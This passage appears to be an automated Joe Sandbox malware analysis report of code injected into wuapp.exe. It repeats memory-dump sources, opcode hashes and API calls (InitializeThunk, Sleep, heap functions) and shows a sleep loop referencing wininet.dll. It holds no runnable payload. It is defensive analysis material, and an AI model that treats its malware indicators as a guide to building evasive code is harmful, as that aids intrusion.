                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F5FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000A9070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 243 a9070-a909f 244 a90ab-a90b2 243->244 245 a90a6 call abd30 243->245 246 a90b8-a9108 call abe00 call 9ace0 call a4e40 244->246 247 a918c-a9192 244->247 245->244 254 a9110-a9121 Sleep 246->254 255 a9123-a9129 254->255 256 a9186-a918a 254->256 257 a912b-a9151 call a8c90 255->257 258 a9153-a9173 255->258 256->247 256->254 260 a9179-a917c 257->260 258->260 261 a9174 call a8ea0 258->261 260->256 261->260
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 000A9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                                          • Instruction ID: 8da8083dfd8435148b0dfdff1e870f1e41233d81f595f95ac1f738720e5925f7
                                                          • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                                          • Instruction Fuzzy Hash: D131C4B2A40345BBC724DFA4C885FA7B7F8BB88700F10851DF62A5B246DB30A510CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000A9066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 88sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 263 a9066-a9069 264 a906b 263->264 265 a907f-a90b2 call abd30 263->265 266 a906d-a907b 264->266 267 a9061-a9065 264->267 270 a90b8-a9108 call abe00 call 9ace0 call a4e40 265->270 271 a918c-a9192 265->271 266->265 278 a9110-a9121 Sleep 270->278 279 a9123-a9129 278->279 280 a9186-a918a 278->280 281 a912b-a9151 call a8c90 279->281 282 a9153-a9173 279->282 280->271 280->278 284 a9179-a917c 281->284 282->284 285 a9174 call a8ea0 282->285 284->280 285->284
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 000A9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 580e89b0c1b3bf91298646061bbca11b6c8bef704af4fbb2783a248481a84060
                                                          • Instruction ID: faca3fc8f99ff33ae2edbfaed9828cb9df2ec34fce8ab6b056a5e75a175c6580
                                                          • Opcode Fuzzy Hash: 580e89b0c1b3bf91298646061bbca11b6c8bef704af4fbb2783a248481a84060
                                                          • Instruction Fuzzy Hash: 9031E571A40245BFCB64DFA4C885FA7B7F4BB85700F10815EFA1D5B242D770A560CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA692 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 287 aa692-aa699 288 aa69b-aa6cc call aaf50 287->288 289 aa62d-aa634 287->289 290 aa63c-aa651 RtlAllocateHeap 289->290 291 aa637 call aaf50 289->291 291->290
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&E,?,000A4C9F,000A4C9F,?,000A4526,?,?,?,?,?,00000000,00000000,?), ref: 000AA64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &E
                                                          • API String ID: 1279760036-2925179166
                                                          • Opcode ID: 9f14153c7c09b872e486ff3e0dc860cf3cb64a31346ae6aab388c46ed4bd2bbe
                                                          • Instruction ID: b024018fbb60602390810aca8f6bc0c659d61885649089aa0c8a6a5586c073f3
                                                          • Opcode Fuzzy Hash: 9f14153c7c09b872e486ff3e0dc860cf3cb64a31346ae6aab388c46ed4bd2bbe
                                                          • Instruction Fuzzy Hash: D3F0D1B56042406FD710EFA8D881EEB7BA8AF46254F148199F85C5B242C231E904CAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 307 aa652-aa677 call aaf50 309 aa67c-aa691 RtlFreeHeap 307->309
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA68D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 0713bdf17e3910512d3208d684b3a1ba0014d390962b5878974628b133758230
                                                          • Instruction ID: b3c7a3f99e8311285285b5f5539ae6fb27a49e96061c01ee9bd44c4716bfa9fb
                                                          • Opcode Fuzzy Hash: 0713bdf17e3910512d3208d684b3a1ba0014d390962b5878974628b133758230
                                                          • Instruction Fuzzy Hash: 0FE06DB12142056FD718DF98DC44E9B3768AF49310F004558F90C5B282C630ED14CBA0
                                                          Uniqueness

